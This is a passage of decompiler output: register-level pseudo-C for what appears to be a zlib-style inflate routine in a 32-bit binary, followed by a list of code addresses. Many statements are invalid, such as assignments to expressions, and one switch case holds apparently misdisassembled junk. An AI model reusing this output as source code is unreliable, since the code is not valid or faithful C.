																	__eax = (__edx & 0x00000007) + 3;
																	__edx = __edx >> 3;
																	 *(__esp + 0x30) = __eax;
																	__eax = 0xfffffffd;
																	L234:
																	__edi =  *(__esp + 0x20);
																	__esi = __esi + __eax;
																	__eflags = __esi;
																	 *(__esp + 0x38) = 0;
																	__eax =  *(__esp + 0x30);
																	goto L235;
																} else {
																	while(1) {
																		__eflags = __ebp;
																		if(__ebp == 0) {
																			goto L103;
																		}
																		__eax =  *__ebx & 0x000000ff;
																		__ecx = __esi;
																		__eax = ( *__ebx & 0x000000ff) << __cl;
																		__ebx = __ebx + 1;
																		__edx = __edx + __eax;
																		 *(__esp + 0x14) = __ebx;
																		__esi = __esi + 8;
																		 *(__esp + 0x10) = __edx;
																		__ebp = __ebp - 1;
																		__eflags = __esi - __edi;
																		if(__esi < __edi) {
																			continue;
																		} else {
																			__ecx =  *(__esp + 0x38);
																			goto L227;
																		}
																		goto L370;
																	}
																	goto L103;
																}
															}
														} else {
															__eax = __eax >> 8;
															__ecx = __cl & 0x000000ff;
															__ecx = (__cl & 0x000000ff) + 2;
															 *(__esp + 0x38) = __ecx;
															__eflags = __esi - __ecx;
															if(__esi >= __ecx) {
																L219:
																__edx =  *(__esp + 0x10);
																__edi =  *(__esp + 0x20);
																__ecx = __ah & 0x000000ff;
																__eax =  *(__esp + 0x34);
																__esi = __esi - (__ah & 0x000000ff);
																__edx =  *(__esp + 0x10) >> __cl;
																 *(__esp + 0x10) = __edx;
																__eflags = __eax;
																if(__eax == 0) {
																	L245:
																	__ecx =  *(__esp + 0x48);
																	 *(__ecx + 0x18) = "invalid bit length repeat";
																	 *__edi = 0x1d;
																	goto L183;
																} else {
																	 *(__esp + 0x38) = __eax;
																	__eax = __edx;
																	__eax = __edx & 0x00000003;
																	__edx = __edx >> 2;
																	__eax = __eax + 3;
																	__esi = __esi - 2;
																	 *(__esp + 0x30) = __eax;
																	L235:
																	 *(__edi + 0x64) =  *(__edi + 0x64) +  *(__edi + 0x60);
																	__eax = __eax +  *(__esp + 0x34);
																	__ebx =  *(__esp + 0x14);
																	 *(__esp + 0x10) = __edx;
																	__eflags = __eax -  *(__edi + 0x64) +  *(__edi + 0x60);
																	if(__eax >  *(__edi + 0x64) +  *(__edi + 0x60)) {
																		goto L245;
																	} else {
																		__ecx =  *(__esp + 0x30);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__edx =  *(__esp + 0x38);
																			do {
																				__eax =  *(__edi + 0x68);
																				 *((short*)(__edi + 0x70 +  *(__edi + 0x68) * 2)) = __dx;
																				 *(__edi + 0x68) = 1 +  *(__edi + 0x68);
																				__ecx = __ecx - 1;
																				__eflags = __ecx;
																			} while (__ecx != 0);
																		}
																		__ecx =  *(__esp + 0x20);
																		__edi =  *(__esp + 0x10);
																		goto L240;
																	}
																}
															} else {
																while(1) {
																	__eflags = __ebp;
																	if(__ebp == 0) {
																		goto L104;
																	}
																	__edx =  *__ebx & 0x000000ff;
																	__ecx = __esi;
																	__edx = ( *__ebx & 0x000000ff) << __cl;
																	__ebx = __ebx + 1;
																	__edi = __edi + __edx;
																	 *(__esp + 0x14) = __ebx;
																	__esi = __esi + 8;
																	 *(__esp + 0x10) = __edi;
																	__ebp = __ebp - 1;
																	__eflags = __esi -  *(__esp + 0x38);
																	if(__esi <  *(__esp + 0x38)) {
																		continue;
																	} else {
																		goto L219;
																	}
																	goto L370;
																}
																goto L104;
															}
														}
													} else {
														__eax = __eax >> 8;
														__ecx = __al & 0x000000ff;
														__eax =  *(__esp + 0x34);
														__esi = __esi - (__al & 0x000000ff);
														__edi = __edi >> __cl;
														__ecx =  *(__esp + 0x20);
														 *(__esp + 0x10) = __edi;
														 *((short*)(__ecx + 0x70 +  *(__esp + 0x34) * 2)) = __dx;
														 *(__ecx + 0x68) = 1 +  *(__ecx + 0x68);
														goto L240;
													}
												} else {
													while(1) {
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L104;
														}
														__eax =  *__ebx & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebx & 0x000000ff) << __cl;
														__edx = 1;
														__edi = __edi + (( *__ebx & 0x000000ff) << __cl);
														__ebx = __ebx + 1;
														__eax =  *(__esp + 0x40);
														__esi = __esi + 8;
														__ebp = __ebp - 1;
														 *(__esp + 0x10) = __edi;
														 *(__esp + 0x14) = __ebx;
														__ecx =  *( *(__esp + 0x40));
														__eax =  *(__esp + 0x20);
														1 << __cl = (1 << __cl) - 1;
														__edx = (0x00000001 << __cl) - 0x00000001 & __edi;
														__eax =  *( *(__esp + 0x20) + 0x4c);
														__eax =  *( *( *(__esp + 0x20) + 0x4c) + ((0x00000001 << __cl) - 0x00000001 & __edi) * 4);
														__eax = __eax >> 8;
														__ecx = __cl & 0x000000ff;
														 *(__esp + 0x38) = __eax;
														__eflags = (__cl & 0x000000ff) - __esi;
														if((__cl & 0x000000ff) > __esi) {
															continue;
														} else {
															goto L212;
														}
														goto L370;
													}
													goto L104;
												}
												goto L370;
												L240:
												__eax =  *(__ecx + 0x64);
												__edx =  *(__ecx + 0x68);
												__eax =  *(__ecx + 0x64) +  *((intOrPtr*)(__ecx + 0x60));
												 *(__esp + 0x34) = __edx;
												__eflags = __edx - __eax;
											} while (__edx < __eax);
											__edi =  *(__esp + 0x20);
											goto L242;
										}
										goto L370;
									case 0x13:
										L252:
										 *__edi = 0x14;
										goto L253;
									case 0x14:
										L253:
										__eflags = __ebp - 6;
										if(__ebp < 6) {
											L257:
											__eax =  *(__edi + 0x4c);
											__ecx =  *(__edi + 0x54);
											 *(__esp + 0x34) =  *(__edi + 0x4c);
											1 = 1 << __cl;
											__ecx =  *(__edi + 0x4c);
											(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __edx;
											 *(__edi + 0x1bc4) = 0;
											__eax =  *( *(__edi + 0x4c) + ((0x00000001 << __cl) - 0x00000001 & __edx) * 4);
											1 = 1 >> 8;
											__ecx = __cl & 0x000000ff;
											__eflags = (__cl & 0x000000ff) - __esi;
											if((__cl & 0x000000ff) <= __esi) {
												L260:
												__eflags = __al;
												if(__al == 0) {
													L267:
													__eax = __eax >> 8;
													__ecx = __cl & 0x000000ff;
													 *(__edi + 0x1bc4) =  *(__edi + 0x1bc4) + __ecx;
													__esi = __esi - __ecx;
													__edx = __edx >> __cl;
													__ecx = __eax;
													__ecx = __eax >> 0x10;
													 *(__esp + 0x10) = __edx;
													 *(__edi + 0x40) = __ecx;
													__eflags = __al;
													if(__al != 0) {
														__eflags = __al & 0x00000020;
														if((__al & 0x00000020) == 0) {
															__eflags = __al & 0x00000040;
															if((__al & 0x00000040) == 0) {
																__eax = __al & 0x000000ff;
																__eax = __al & 0xf;
																__eflags = __eax;
																 *__edi = 0x15;
																 *(__edi + 0x48) = __eax;
																goto L274;
															} else {
																__ecx =  *(__esp + 0x48);
																 *(__ecx + 0x18) = "invalid literal/length code";
																 *__edi = 0x1d;
																goto L183;
															}
														} else {
															 *(__edi + 0x1bc4) = 0xffffffff;
															 *__edi = 0xb;
															goto L182;
														}
													} else {
														 *__edi = 0x19;
														goto L182;
													}
												} else {
													__eflags = __al & 0x000000f0;
													if((__al & 0x000000f0) != 0) {
														goto L267;
													} else {
														__ecx = __eax;
														__ebx = 1;
														__ecx = __eax >> 8;
														__edx = __eax;
														__edi = __cl & 0x000000ff;
														 *(__esp + 0x30) = __eax >> 8;
														__al & 0x000000ff = (__al & 0x000000ff) + __edi;
														__eax = __eax >> 0x10;
														__ebx = 1 << __cl;
														__ecx = __edi;
														__ebx = (1 << __cl) - 1;
														 *(__esp + 0x38) = __edx;
														(0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10) = ((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl;
														__ecx =  *(__esp + 0x34);
														__ebx = (((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl) + __eax;
														__eax =  *( *(__esp + 0x34) + ((((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl) + __eax) * 4);
														__eax = __eax >> 8;
														__edi = __cl & 0x000000ff;
														 *(__esp + 0x30) = __cl & 0x000000ff;
														__edi = (__cl & 0x000000ff) + (__cl & 0x000000ff);
														__eflags = (__cl & 0x000000ff) + (__cl & 0x000000ff) - __esi;
														if((__cl & 0x000000ff) + (__cl & 0x000000ff) <= __esi) {
															L266:
															__edi =  *(__esp + 0x20);
															__ebx =  *(__esp + 0x14);
															__ecx = __dh & 0x000000ff;
															__edx =  *(__esp + 0x10);
															__edx =  *(__esp + 0x10) >> __cl;
															__esi = __esi - __ecx;
															__eflags = __esi;
															 *(__edi + 0x1bc4) = __ecx;
															goto L267;
														} else {
															while(1) {
																__eflags = __ebp;
																if(__ebp == 0) {
																	goto L103;
																}
																__ebx =  *(__esp + 0x14);
																__ecx = __esi;
																__edi = 1;
																__esi = __esi + 8;
																__ebp = __ebp - 1;
																__eax =  *__ebx & 0x000000ff;
																__ebx = __ebx + 1;
																 *(__esp + 0x10) =  *(__esp + 0x10) + __eax;
																__eax =  *(__esp + 0x3a) & 0x0000ffff;
																 *(__esp + 0x14) = __ebx;
																__ebx = __dh & 0x000000ff;
																__dl & 0x000000ff = __ebx + (__dl & 0x000000ff);
																__edi = 1 << __cl;
																__ecx = __ebx;
																(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10);
																((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl = (((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl) + ( *(__esp + 0x3a) & 0x0000ffff);
																 *(__esp + 0x20) =  *( *(__esp + 0x20) + 0x4c);
																__eax =  *( *( *(__esp + 0x20) + 0x4c) + ((((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl) + ( *(__esp + 0x3a) & 0x0000ffff)) * 4);
																__eax = __eax >> 8;
																__cl & 0x000000ff = __ebx + (__cl & 0x000000ff);
																__eflags = __ebx + (__cl & 0x000000ff) - __esi;
																if(__ebx + (__cl & 0x000000ff) > __esi) {
																	continue;
																} else {
																	goto L266;
																}
																goto L370;
															}
															goto L103;
														}
													}
												}
											} else {
												while(1) {
													__eflags = __ebp;
													if(__ebp == 0) {
														goto L103;
													}
													__eax =  *__ebx & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebx & 0x000000ff) << __cl;
													__ebx = __ebx + 1;
													__ecx =  *(__edi + 0x54);
													__edx = __edx + __eax;
													__eax =  *(__edi + 0x4c);
													__esi = __esi + 8;
													 *(__esp + 0x10) = __edx;
													__ebp = __ebp - 1;
													__edx = 1;
													 *(__esp + 0x14) = __ebx;
													1 << __cl = (1 << __cl) - 1;
													__edx = (0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10);
													__eax =  *( *(__edi + 0x4c) + ((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) * 4);
													__ecx = __eax;
													__edx =  *(__esp + 0x10);
													__eax >> 8 = __cl & 0x000000ff;
													__eflags = (__cl & 0x000000ff) - __esi;
													if((__cl & 0x000000ff) > __esi) {
														continue;
													} else {
														goto L260;
													}
													goto L370;
												}
												goto L103;
											}
										} else {
											__eflags =  *(__esp + 0x18) - 0x102;
											if( *(__esp + 0x18) < 0x102) {
												goto L257;
											} else {
												__eax =  *(__esp + 0x24);
												_push( *(__esp + 0x28));
												 *(0xc + __ecx) = __eax;
												__eax =  *(__esp + 0x1c);
												 *(__ecx + 0x10) =  *(__esp + 0x1c);
												 *__ecx = __ebx;
												 *(__ecx + 4) = __ebp;
												_push(__ecx);
												 *(__edi + 0x38) = __edx;
												 *(__edi + 0x3c) = __esi;
												__eax = E00411250();
												__ecx =  *(__esp + 0x50);
												__esp = __esp + 8;
												__eflags =  *__edi - 0xb;
												__edx =  *(__edi + 0x38);
												__esi =  *(__edi + 0x3c);
												__eax =  *(0xc + __ecx);
												__ebx =  *__ecx;
												__ebp =  *(__ecx + 4);
												 *(__esp + 0x24) =  *(0xc + __ecx);
												__eax =  *(__ecx + 0x10);
												 *(__esp + 0x18) = __eax;
												 *(__esp + 0x14) = __ebx;
												 *(__esp + 0x10) = __edx;
												if( *__edi == 0xb) {
													 *(__edi + 0x1bc4) = 0xffffffff;
												}
												goto L183;
											}
										}
										goto L370;
									case 0x15:
										L274:
										__ecx =  *(__edi + 0x48);
										__eflags = __ecx;
										if(__ecx == 0) {
											L280:
											__eax =  *(__edi + 0x40);
											 *(__edi + 0x1bc8) =  *(__edi + 0x40);
											 *__edi = 0x16;
											goto L281;
										} else {
											__eflags = __esi - __ecx;
											if(__esi >= __ecx) {
												L279:
												__eax = 1;
												__esi = __esi - __ecx;
												1 << __cl = (1 << __cl) - 1;
												__eax = (0x00000001 << __cl) - 0x00000001 & __edx;
												__edx = __edx >> __cl;
												 *(__edi + 0x40) =  *(__edi + 0x40) + __eax;
												_t539 = __edi + 0x1bc4;
												 *_t539 =  *(__edi + 0x1bc4) + __ecx;
												__eflags =  *_t539;
												 *(__esp + 0x10) = __edx;
												goto L280;
											} else {
												while(1) {
													__eflags = __ebp;
													if(__ebp == 0) {
														goto L103;
													}
													__eax =  *__ebx & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebx & 0x000000ff) << __cl;
													__ebx = __ebx + 1;
													__ecx =  *(__edi + 0x48);
													__edx = __edx + __eax;
													__esi = __esi + 8;
													 *(__esp + 0x10) = __edx;
													__ebp = __ebp - 1;
													 *(__esp + 0x14) = __ebx;
													__eflags = __esi - __ecx;
													if(__esi < __ecx) {
														continue;
													} else {
														goto L279;
													}
													goto L370;
												}
												goto L103;
											}
										}
										goto L370;
									case 0x16:
										L281:
										__eax =  *(__edi + 0x50);
										__ecx =  *(__edi + 0x58);
										 *(__esp + 0x34) =  *(__edi + 0x50);
										1 = 1 << __cl;
										__ecx =  *(__edi + 0x50);
										(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __edx;
										__eax =  *( *(__edi + 0x50) + ((0x00000001 << __cl) - 0x00000001 & __edx) * 4);
										1 = 1 >> 8;
										__ecx = __cl & 0x000000ff;
										__eflags = (__cl & 0x000000ff) - __esi;
										if((__cl & 0x000000ff) <= __esi) {
											L284:
											__eflags = __al & 0x000000f0;
											if((__al & 0x000000f0) != 0) {
												L289:
												__ebx =  *(__esp + 0x14);
												__eax = __eax >> 8;
												__ecx = __cl & 0x000000ff;
												 *(__edi + 0x1bc4) =  *(__edi + 0x1bc4) + __ecx;
												__esi = __esi - __ecx;
												__edx = __edx >> __cl;
												 *(__esp + 0x10) = __edx;
												__eflags = __al & 0x00000040;
												if((__al & 0x00000040) == 0) {
													__ecx = __eax;
													 *__edi = 0x17;
													__ecx = __eax >> 0x10;
													__eax = __al & 0x000000ff;
													__eax = __al & 0xf;
													__eflags = __eax;
													 *(__edi + 0x44) = __ecx;
													 *(__edi + 0x48) = __eax;
													goto L292;
												} else {
													__ecx =  *(__esp + 0x48);
													 *(__ecx + 0x18) = "invalid distance code";
													 *__edi = 0x1d;
													goto L183;
												}
											} else {
												__ecx = __eax;
												__ebx = 1;
												__ecx = __eax >> 8;
												__edx = __eax;
												__edi = __cl & 0x000000ff;
												 *(__esp + 0x30) = __eax >> 8;
												__al & 0x000000ff = (__al & 0x000000ff) + __edi;
												__eax = __eax >> 0x10;
												__ebx = 1 << __cl;
												__ecx = __edi;
												__ebx = (1 << __cl) - 1;
												 *(__esp + 0x38) = __edx;
												(0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10) = ((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl;
												__ecx =  *(__esp + 0x34);
												__ebx = (((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl) + __eax;
												__eax =  *( *(__esp + 0x34) + ((((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl) + __eax) * 4);
												__eax = __eax >> 8;
												__edi = __cl & 0x000000ff;
												 *(__esp + 0x30) = __cl & 0x000000ff;
												__edi = (__cl & 0x000000ff) + (__cl & 0x000000ff);
												__eflags = (__cl & 0x000000ff) + (__cl & 0x000000ff) - __esi;
												if((__cl & 0x000000ff) + (__cl & 0x000000ff) <= __esi) {
													L288:
													__edi =  *(__esp + 0x20);
													__ecx = __dh & 0x000000ff;
													__edx =  *(__esp + 0x10);
													__esi = __esi - __ecx;
													__edx =  *(__esp + 0x10) >> __cl;
													_t579 = __edi + 0x1bc4;
													 *_t579 =  *(__edi + 0x1bc4) + __ecx;
													__eflags =  *_t579;
													goto L289;
												} else {
													while(1) {
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L103;
														}
														__ebx =  *(__esp + 0x14);
														__ecx = __esi;
														__edi = 1;
														__esi = __esi + 8;
														__ebp = __ebp - 1;
														__eax =  *__ebx & 0x000000ff;
														__ebx = __ebx + 1;
														 *(__esp + 0x10) =  *(__esp + 0x10) + __eax;
														__eax =  *(__esp + 0x3a) & 0x0000ffff;
														 *(__esp + 0x14) = __ebx;
														__ebx = __dh & 0x000000ff;
														__dl & 0x000000ff = __ebx + (__dl & 0x000000ff);
														__edi = 1 << __cl;
														__ecx = __ebx;
														(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10);
														((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl = (((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl) + ( *(__esp + 0x3a) & 0x0000ffff);
														 *(__esp + 0x20) =  *( *(__esp + 0x20) + 0x50);
														__eax =  *( *( *(__esp + 0x20) + 0x50) + ((((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl) + ( *(__esp + 0x3a) & 0x0000ffff)) * 4);
														__eax = __eax >> 8;
														__cl & 0x000000ff = __ebx + (__cl & 0x000000ff);
														__eflags = __ebx + (__cl & 0x000000ff) - __esi;
														if(__ebx + (__cl & 0x000000ff) > __esi) {
															continue;
														} else {
															goto L288;
														}
														goto L370;
													}
													goto L103;
												}
											}
										} else {
											while(1) {
												__eflags = __ebp;
												if(__ebp == 0) {
													goto L103;
												}
												__eax =  *__ebx & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebx & 0x000000ff) << __cl;
												__ebx = __ebx + 1;
												__ecx =  *(__edi + 0x58);
												__edx = __edx + __eax;
												__eax =  *(__edi + 0x50);
												__esi = __esi + 8;
												 *(__esp + 0x10) = __edx;
												__ebp = __ebp - 1;
												__edx = 1;
												 *(__esp + 0x14) = __ebx;
												1 << __cl = (1 << __cl) - 1;
												__edx = (0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10);
												__eax =  *( *(__edi + 0x50) + ((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) * 4);
												__ecx = __eax;
												__edx =  *(__esp + 0x10);
												__eax >> 8 = __cl & 0x000000ff;
												__eflags = (__cl & 0x000000ff) - __esi;
												if((__cl & 0x000000ff) > __esi) {
													continue;
												} else {
													goto L284;
												}
												goto L370;
											}
											goto L103;
										}
										goto L370;
									case 0x17:
										L292:
										__ecx =  *(__edi + 0x48);
										__eflags = __ecx;
										if(__ecx == 0) {
											L298:
											 *__edi = 0x18;
											goto L299;
										} else {
											__eflags = __esi - __ecx;
											if(__esi >= __ecx) {
												L297:
												__eax = 1;
												__esi = __esi - __ecx;
												1 << __cl = (1 << __cl) - 1;
												__eax = (0x00000001 << __cl) - 0x00000001 & __edx;
												__edx = __edx >> __cl;
												 *(__edi + 0x44) =  *(__edi + 0x44) + __eax;
												_t597 = __edi + 0x1bc4;
												 *_t597 =  *(__edi + 0x1bc4) + __ecx;
												__eflags =  *_t597;
												 *(__esp + 0x10) = __edx;
												goto L298;
											} else {
												while(1) {
													__eflags = __ebp;
													if(__ebp == 0) {
														goto L103;
													}
													__eax =  *__ebx & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebx & 0x000000ff) << __cl;
													__ebx = __ebx + 1;
													__ecx =  *(__edi + 0x48);
													__edx = __edx + __eax;
													__esi = __esi + 8;
													 *(__esp + 0x10) = __edx;
													__ebp = __ebp - 1;
													 *(__esp + 0x14) = __ebx;
													__eflags = __esi - __ecx;
													if(__esi < __ecx) {
														continue;
													} else {
														goto L297;
													}
													goto L370;
												}
												goto L103;
											}
										}
										goto L370;
									case 0x18:
										L299:
										__ecx =  *(__esp + 0x18);
										__eflags = __ecx;
										if(__ecx == 0) {
											goto L103;
										} else {
											__eax =  *(__esp + 0x28);
											__eax =  *(__esp + 0x28) - __ecx;
											__ecx =  *(__edi + 0x44);
											__eflags = __ecx - __eax;
											if(__ecx <= __eax) {
												__eax =  *(__esp + 0x24);
												__eax =  *(__esp + 0x24) - __ecx;
												__eflags = __eax;
												 *(__esp + 0x38) = __eax;
												__eax =  *(__edi + 0x40);
												goto L310;
											} else {
												__ecx = __ecx - __eax;
												__eflags = __ecx -  *((intOrPtr*)(__edi + 0x2c));
												if(__ecx <=  *((intOrPtr*)(__edi + 0x2c))) {
													L304:
													__eax =  *(__edi + 0x30);
													__eflags = __ecx - __eax;
													if(__ecx <= __eax) {
														 *((intOrPtr*)(__edi + 0x34)) =  *((intOrPtr*)(__edi + 0x34)) - __ecx;
														__eax =  *((intOrPtr*)(__edi + 0x34)) - __ecx +  *(__edi + 0x30);
														__eflags = __eax;
													} else {
														__ecx = __ecx - __eax;
														 *((intOrPtr*)(__edi + 0x34)) =  *((intOrPtr*)(__edi + 0x34)) +  *((intOrPtr*)(__edi + 0x28));
														__eax =  *((intOrPtr*)(__edi + 0x34)) +  *((intOrPtr*)(__edi + 0x28)) - __ecx;
													}
													 *(__esp + 0x38) = __eax;
													__eax =  *(__edi + 0x40);
													__eflags = __ecx - __eax;
													if(__ecx > __eax) {
														L310:
														__ecx = __eax;
													}
													__eflags = __ecx -  *(__esp + 0x18);
													if(__ecx >  *(__esp + 0x18)) {
														__ecx =  *(__esp + 0x18);
													}
													__ebx =  *(__esp + 0x38);
													__eax = __eax - __ecx;
													 *(__esp + 0x18) =  *(__esp + 0x18) - __ecx;
													 *(__edi + 0x40) = __eax;
													__edi =  *(__esp + 0x24);
													__ebx =  *(__esp + 0x38) - __edi;
													__eflags = __ebx;
													do {
														__al =  *((intOrPtr*)(__ebx + __edi));
														 *__edi = __al;
														__edi = 1 + __edi;
														__ecx = __ecx - 1;
														__eflags = __ecx;
													} while (__ecx != 0);
													__ebx =  *(__esp + 0x14);
													 *(__esp + 0x24) = __edi;
													__edi =  *(__esp + 0x20);
													__eflags =  *(__edi + 0x40) - __ecx;
													if( *(__edi + 0x40) == __ecx) {
														 *__edi = 0x14;
													}
													L182:
													_t771 =  *(_t812 + 0x48);
												} else {
													__eflags =  *(__edi + 0x1bc0);
													if( *(__edi + 0x1bc0) == 0) {
														goto L304;
													} else {
														__ecx =  *(__esp + 0x48);
														 *(__ecx + 0x18) = "invalid distance too far back";
														 *__edi = 0x1d;
													}
												}
											}
											goto L183;
										}
										goto L370;
									case 0x19:
										__eflags =  *(__esp + 0x18);
										if( *(__esp + 0x18) == 0) {
											goto L103;
										} else {
											__ebx =  *(__esp + 0x24);
											__al =  *(__edi + 0x40);
											 *(__esp + 0x24) =  *(__esp + 0x24) + 1;
											 *(__esp + 0x18) =  *(__esp + 0x18) - 1;
											 *( *(__esp + 0x24)) = __al;
											__ebx =  *(__esp + 0x14);
											 *__edi = 0x14;
											goto L183;
										}
										goto L370;
									case 0x1a:
										__eflags =  *(__edi + 8);
										if ( *(__edi + 8) == 0) goto L335;
										__eflags = __al & __cl;
										 *__eax =  *__eax + __al;
										_t640 = __ebx + 0x277320fe;
										 *_t640 =  *(__ebx + 0x277320fe) + __al;
										__eflags =  *_t640;
									case 0x1b:
										__eflags =  *(__edi + 8);
										if( *(__edi + 8) == 0) {
											L346:
											 *__edi = 0x1c;
											goto L347;
										} else {
											__eflags =  *(__edi + 0x10);
											if( *(__edi + 0x10) == 0) {
												goto L346;
											} else {
												__eflags = __esi - 0x20;
												if(__esi >= 0x20) {
													L342:
													__eflags = __edx -  *((intOrPtr*)(__edi + 0x1c));
													if(__edx ==  *((intOrPtr*)(__edi + 0x1c))) {
														__ecx = 0;
														__esi = 0;
														__eflags = 0;
														 *(__esp + 0x10) = 0;
														goto L346;
													} else {
														__ecx =  *(__esp + 0x48);
														 *(__ecx + 0x18) = "incorrect length check";
														 *__edi = 0x1d;
														goto L183;
													}
												} else {
													while(1) {
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L103;
														}
														__eax =  *__ebx & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebx & 0x000000ff) << __cl;
														__ebx = __ebx + 1;
														__edx = __edx + __eax;
														 *(__esp + 0x14) = __ebx;
														__esi = __esi + 8;
														 *(__esp + 0x10) = __edx;
														__ebp = __ebp - 1;
														__eflags = __esi - 0x20;
														if(__esi < 0x20) {
															continue;
														} else {
															goto L342;
														}
														goto L370;
													}
													goto L103;
												}
											}
										}
										goto L370;
									case 0x1c:
										L347:
										 *(__esp + 0x2c) = 1;
										goto L103;
									case 0x1d:
										 *(__esp + 0x2c) = 0xfffffffd;
										L103:
										_t795 =  *(_t812 + 0x10);
										L104:
										_t787 =  *((intOrPtr*)(_t812 + 0x4c));
										L105:
										_t778 =  *(_t812 + 0x48);
										_t767 =  *(_t812 + 0x20);
										_t778[3] =  *(_t812 + 0x24);
										_t778[4] =  *(_t812 + 0x18);
										_t778[1] = _t805;
										_t807 =  *((intOrPtr*)(_t812 + 0x28));
										 *_t778 =  *(_t812 + 0x14);
										__eflags =  *(_t767 + 0x28);
										 *(_t767 + 0x38) = _t795;
										 *(_t767 + 0x3c) = _t798;
										if( *(_t767 + 0x28) != 0) {
											L110:
											_t743 = E004101E0(_t778, _t778[3], _t807 - _t778[4]);
											_t812 = _t812 + 0xc;
											__eflags = _t743;
											if(_t743 == 0) {
												_t778 =  *(_t812 + 0x48);
												goto L353;
											} else {
												 *_t767 = 0x1e;
												goto L112;
											}
										} else {
											__eflags = _t807 - _t778[4];
											if(_t807 == _t778[4]) {
												L353:
												_t745 =  *((intOrPtr*)(_t812 + 0x3c)) - _t778[1];
												_t808 = _t807 - _t778[4];
												_t778[2] =  &(_t778[2][_t745]);
												_t778[5] =  &(_t778[5][_t808]);
												 *((intOrPtr*)(_t767 + 0x1c)) =  *((intOrPtr*)(_t767 + 0x1c)) + _t808;
												__eflags =  *(_t767 + 8);
												 *((intOrPtr*)(_t812 + 0x3c)) = _t745;
												if( *(_t767 + 8) == 0) {
													L358:
													_t796 =  *(_t812 + 0x48);
												} else {
													__eflags = _t808;
													if(_t808 == 0) {
														goto L358;
													} else {
														_push(_t808);
														__eflags =  *(_t767 + 0x10);
														_push(_t778[3] - _t808);
														_push( *(_t767 + 0x18));
														if( *(_t767 + 0x10) == 0) {
															_t757 = E00410AD0();
															_t796 =  *(_t812 + 0x54);
															_t812 = _t812 + 0xc;
															 *(_t767 + 0x18) = _t757;
															_t796[0xc] = _t757;
														} else {
															_t758 = E004102D0();
															_t796 =  *(_t812 + 0x54);
															_t812 = _t812 + 0xc;
															 *(_t767 + 0x18) = _t758;
															_t796[0xc] = _t758;
														}
													}
												}
												_t788 =  *_t767;
												__eflags = _t788 - 0x13;
												if(_t788 == 0x13) {
													L362:
													_t800 = 0x100;
												} else {
													__eflags = _t788 - 0xe;
													if(_t788 == 0xe) {
														goto L362;
													} else {
														_t800 = 0;
													}
												}
												asm("sbb ecx, ecx");
												_t788 - 0xb =  *((intOrPtr*)(_t812 + 0x3c));
												_t796[0xb] = ((0 | _t788 != 0x0000000b) - 0x00000001 & 0x00000080) + ( ~( *(_t767 + 4)) & 0x00000040) + _t800 +  *(_t767 + 0x3c);
												if( *((intOrPtr*)(_t812 + 0x3c)) != 0) {
													L365:
													__eflags =  *((intOrPtr*)(_t812 + 0x4c)) - 4;
													if( *((intOrPtr*)(_t812 + 0x4c)) != 4) {
														return  *(_t812 + 0x2c);
													} else {
														goto L366;
													}
												} else {
													__eflags = _t808;
													if(_t808 == 0) {
														L366:
														_t753 =  *(_t812 + 0x2c);
														__eflags = _t753;
														if(_t753 != 0) {
															goto L113;
														} else {
															return 0xfffffffb;
														}
													} else {
														goto L365;
													}
												}
											} else {
												_t759 =  *_t767;
												__eflags = _t759 - 0x1d;
												if(_t759 >= 0x1d) {
													goto L353;
												} else {
													__eflags = _t759 - 0x1a;
													if(_t759 < 0x1a) {
														goto L110;
													} else {
														__eflags = _t787 - 4;
														if(_t787 == 4) {
															goto L353;
														} else {
															goto L110;
														}
													}
												}
											}
										}
										goto L370;
									case 0x1e:
										L112:
										_t753 = 0xfffffffc;
										L113:
										return _t753;
										goto L370;
								}
								L183:
								_t721 =  *_t794;
							} while (_t721 <= 0x1e);
							goto L184;
						}
					}
				}
				L370:
			}

0x0040e800
0x0040e80a
0x0040fe36
0x0040fe3f
0x0040e810
0x0040e810
0x0040e813
0x0040e819
0x00000000
0x0040e838
0x0040e83b
0x0040e83d
0x0040e83d
0x0040e846
0x0040e849
0x0040e84d
0x0040e853
0x0040e857
0x0040e85e
0x0040e861
0x0040e865
0x0040e867
0x0040e86b
0x0040e86f
0x0040e874
0x0040e87a
0x0040f1b5
0x0040f1c1
0x0040e880
0x0040e883
0x0040e887
0x0040e890
0x0040e890
0x00000000
0x0040e897
0x0040e89c
0x0040e8a9
0x0040e8ac
0x0040e8da
0x0040e8da
0x0040e8dc
0x0040e923
0x0040e923
0x0040e926
0x0040e92d
0x0040e92f
0x0040e931
0x0040e931
0x0040e938
0x0040e93c
0x0040e9fc
0x0040e9fc
0x0040ea03
0x0040e942
0x0040e94f
0x0040e958
0x0040e95a
0x0040e95e
0x0040e9f8
0x00000000
0x0040e964
